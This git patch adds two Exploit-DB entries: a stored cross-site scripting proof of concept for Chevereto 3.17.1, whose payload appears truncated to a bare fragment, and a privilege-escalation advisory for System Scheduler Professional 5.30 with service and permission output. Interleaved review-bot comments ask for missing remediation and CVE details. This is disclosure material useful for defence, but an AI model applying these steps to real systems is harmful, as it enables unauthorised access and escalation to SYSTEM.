From 46c569f0e475f821955ff9fb0bea65a52d4f3fa9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 13 May 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-05-13
2 changes to exploits/shellcodes
Splinterware System Scheduler Professional 5.30 - Privilege Escalation
Chevereto 3.17.1 - Cross Site Scripting (Stored)
---
 exploits/multiple/webapps/49859.txt | 14 +++++++++
 exploits/windows/local/49858.txt | 48 +++++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 64 insertions(+)
 create mode 100644 exploits/multiple/webapps/49859.txt
 create mode 100644 exploits/windows/local/49858.txt
diff --git a/exploits/multiple/webapps/49859.txt b/exploits/multiple/webapps/49859.txt
new file mode 100644
index 000000000..13312e07e
--- /dev/null
+++ b/exploits/multiple/webapps/49859.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Chevereto 3.17.1 - Cross Site Scripting (Stored)
+# Google Dork: "powered by chevereto"
+# Date: 19.04.2021
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://chevereto.com/
+# Software Link: https://chevereto.com/releases
+# Version: 3.17.1
+# Tested on: Windows 10 / Xampp
+
+Proof of Concept:
+
+1. Press the Upload image button and upload any image.
+2. After uploading the image, press the pencil icon on the top right of the image and write "> instead of the title.
+3. Upload the picture and go to the picture address.
\ No newline at end of file
diff --git a/exploits/windows/local/49858.txt b/exploits/windows/local/49858.txt
new file mode 100644
index 000000000..72fe92d7b
--- /dev/null
+++ b/exploits/windows/local/49858.txt
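Review bot: The proof-of-concept step on the `2.` line gives the stored value only as `">`, which reads like a fragment left after markup was stripped, and the advisory never says where the image title is rendered without encoding, so a defender cannot map the finding to a specific page or template. The header block also names no CVE, vendor advisory or fixed release — only `# Version: 3.17.1` — so there is nothing a reader can check an installation against. I would add `# Affected component: image title, rendered on the image page (appears unencoded — confirm)` and `# Fix: <not stated — confirm with vendor>` after the `# Tested on:` line, and a closing sentence that server-side output encoding of the title is the remediation.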
@@ -0,0 +1,48 @@
+# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation
+# Date: 2021-05-11
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.splinterware.com
+# Software Link: https://www.splinterware.com/download/ssproeval.exe
+# Version: 5.30 Professional
+# Tested on: Windows 10 Pro 20H2 x64
+
+System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
+where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
+elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;
+renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
+will be executed after a short while.
+
+C:\Users\test>sc qc WindowsScheduler
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: WindowsScheduler
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_AVVIO : 2 AUTO_START
+ CONTROLLO_ERRORE : 0 IGNORE
+ NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe
+ GRUPPO_ORDINE_CARICAMENTO :
+ TAG : 0
+ NOME_VISUALIZZATO : System Scheduler Service
+ DIPENDENZE :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
+C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
+ BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI 
I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
+
+Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
+
+C:\Users\test>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6f309a4f9..582e408d6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11324,6 +11324,7 @@ id,file,description,date,author,type,platform,port
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,
+49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44023,3 +44024,4 @@ id,file,description,date,author,type,platform,port
 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php,
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,
+49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple,
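Review bot: The advisory documents the weak condition — the `icacls` output shows `BUILTIN\Users:(RX,W)` on the install directory plus an inherited `(OI)(CI)(IO)(GR,GW,GE)` entry, and `sc qc` shows `SERVICE_START_NAME : LocalSystem` — but gives no remediation, no vendor contact or fixed version, and no CVE. The evidence shown is a directory ACL only; the ACL on `WService.exe` itself is not listed, so the "insecure file permissions" claim about the binary is supported only indirectly and an `icacls` of the file would make it direct. The console output is from an Italian locale (`OPERAZIONI RIUSCITE`, `TIPO_AVVIO`, `Elaborazione completata`), which a one-line note in the header would explain for readers expecting the English field names. I would append `# Mitigation: remove the BUILTIN\Users write entries (W, GW) from the install directory so only Administrators/SYSTEM can modify WService.exe` and `# Fixed in: <not stated — confirm with vendor>` to the header block, and add that file-integrity monitoring of the service's binary path (rename/create of WService.exe) is the corresponding detection.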